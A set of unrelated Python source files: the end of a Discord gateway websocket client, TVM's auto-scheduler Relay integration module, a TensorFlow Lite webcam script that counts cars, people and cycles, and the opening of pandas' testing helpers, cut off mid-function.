t = threading.Thread(target=self.keep_alive, daemon=True)
t.start()
return self
def keep_alive(self) -> None:
while True:
time.sleep(self.hb_int)
if not self.heartbeat_acked:
# We have a zombified connection
self.socket.close()
asyncio.run(self.start(reconnect=True))
else:
asyncio.run(self.heartbeat())
def on_websocket_message(self, msg: WSMessage) -> dict:
if type(msg) is bytes:
# always push the message data to your cache
self.buffer.extend(msg)
# check if last 4 bytes are ZLIB_SUFFIX
if len(msg) < 4 or msg[-4:] != b"\x00\x00\xff\xff":
return
msg = self.decompress.decompress(self.buffer)
msg = msg.decode("utf-8")
self.buffer = bytearray()
return msg
async def receive_events(self) -> None:
msg: WSMessage = await self.socket.receive()
# if the message is something we can handle
if msg.type is aiohttp.WSMsgType.TEXT or msg.type is aiohttp.WSMsgType.BINARY:
msg = self.on_websocket_message(msg.data)
# if it's a disconnection
elif msg.type in (
aiohttp.WSMsgType.CLOSE,
aiohttp.WSMsgType.CLOSING,
aiohttp.WSMsgType.CLOSED,
):
await self.socket.close()
raise ConnectionResetError(msg.extra)
msg = json.loads(msg)
op = msg["op"]
data = msg["d"]
sequence = msg["s"]
self.sequence = sequence
if op == self.HELLO:
self.hb_int = msg["d"]["heartbeat_interval"] // 1000
await self.heartbeat()
elif op == self.HEARTBEAT:
await self.heartbeat()
elif op == self.DISPATCH:
if msg["t"] == "READY":
self.session_id = msg["d"]["session_id"]
# send event to dispatch
await self.client.handle_event(msg)
async def heartbeat(self) -> None:
"""Send HB packet"""
payload = {"op": self.HEARTBEAT, "d": self.sequence}
await self.socket.send_json(payload)
async def identify(self) -> None:
"""Sends the IDENTIFY packet"""
payload = {
"op": self.IDENTIFY,
"d": {
"token": self.token,
"intents": self.client.intents.value,
"properties": {
"$os": sys.platform,
"$browser": "disthon",
"$device": "disthon",
},
"large_threshold": 250,
"compress": True,
},
}
await self.socket.send_json(payload)
async def resume(self) -> None:
"""Sends the RESUME packet."""
payload = {
"op": self.RESUME,
"d": {
"seq": self.sequence,
"session_id": self.session_id,
"token": self.token,
},
}
await self.socket.send_json(payload)
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import tvm
from tvm import autotvm, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={
"relay.backend.use_auto_scheduler": True,
"relay.backend.disable_compile_engine_cache": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
try:
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
except tvm.TVMError:
print(
"Get errors with GraphRuntimeCodegen for task extraction. "
"Fallback to VMCompiler."
)
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
compiler.lower(mod, target)
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# create search tasks
tasks = []
weights = []
for wkl_key, weight in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
target_host=target_host,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
)
)
weights.append(weight)
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_weight = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
"""
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = 0
self.wkl_key_to_weight[workload_key] += 1
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
target = tvm.target.Target.current()
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(key)
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return None
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
Parameters
----------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
|
tflite_webcam.py
|
import os
import argparse
import cv2.cv2 as cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from datetime import datetime
import csv
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self, resolution=(640, 480)):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3, resolution[0])
ret = self.stream.set(4, resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution',
help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--capture_threshold', help='millisecond before capture',
default=3600000)
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
capture_threshold = int(args.capture_threshold)
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if GRAPH_NAME == 'detect.tflite':
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH, MODEL_NAME, LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del (labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW, imH)).start()
time.sleep(1)
def get_color(name):
if name == 'car':
return 10, 255, 0
elif name == 'person':
return 0, 10, 255
elif name == 'cycle':
return 255, 10, 0
return 0, 127, 255
tick = cv2.getTickCount()
out_file = open("out/%s.csv" % datetime.now().strftime('%Y%m%d-%H%M%S'), 'a')
def capture_samples(frame):
global tick
tick2 = cv2.getTickCount()
t = (tick2 - tick) / freq * 1000
if t > capture_threshold:
tick = tick2
capture(frame)
def capture(frame):
filename = "samples/frame-%s.jpg" % datetime.now().strftime('%Y%m%d-%H%M%S')
cv2.imwrite(filename, frame)
print(filename)
def write_data(file, object_name_list):
car = object_name_list['car']
person = object_name_list['person']
cycle = object_name_list['cycle']
writer = csv.writer(file, delimiter=',')
epoch = int(time.time() * 1000)
writer.writerow([epoch, car, person, cycle])
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
try:
frame1 = videostream.read()
except Exception as e:
out_file.flush()
out_file.close()
raise e
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Press 'q' to quit
key = cv2.waitKey(1)
if key == ord('q'):
out_file.close()
break
elif key == ord('s'):
capture(frame)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
# num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
overlay = frame.copy()
object_name_list = {'car': 0, 'person': 0, 'cycle': 0}
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if (scores[i] > min_conf_threshold) and (scores[i] <= 1.0):
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
object_name_list[object_name] += 1
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * imH)))
xmin = int(max(1, (boxes[i][1] * imW)))
ymax = int(min(imH, (boxes[i][2] * imH)))
xmax = int(min(imW, (boxes[i][3] * imW)))
color = get_color(object_name)
cv2.rectangle(overlay, (xmin, ymin), (xmax, ymax), color, 2)
# Draw label
label = '%d' % (int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 1) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(overlay, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(overlay, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# All the results have been drawn on the frame, so it's time to display it.
alpha = 0.4
frame = cv2.addWeighted(overlay, alpha, frame, 1 - alpha, 0)
# Draw framerate in corner of frame
cv2.putText(frame, '{0:.2f} / {1:.0f}'.format(frame_rate_calc, 1.0 / frame_rate_calc * 1000), (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (52, 235, 52),
2,
cv2.LINE_AA)
cv2.putText(frame, 'car: %d' % object_name_list['car'], (30, 50 * 2), cv2.FONT_HERSHEY_SIMPLEX, 1, get_color('car'),
2,
cv2.LINE_AA)
cv2.putText(frame, 'person: %d' % object_name_list['person'], (30, 50 * 3), cv2.FONT_HERSHEY_SIMPLEX, 1,
get_color('person'),
2,
cv2.LINE_AA)
cv2.putText(frame, 'cycle: %d' % object_name_list['cycle'], (30, 50 * 4), cv2.FONT_HERSHEY_SIMPLEX, 1,
get_color('cycle'),
2,
cv2.LINE_AA)
cv2.imshow('Object detector', frame)
write_data(out_file, object_name_list)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2 - t1) / freq
frame_rate_calc = 1 / time1
# Clean up
cv2.destroyAllWindows()
videostream.stop()
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
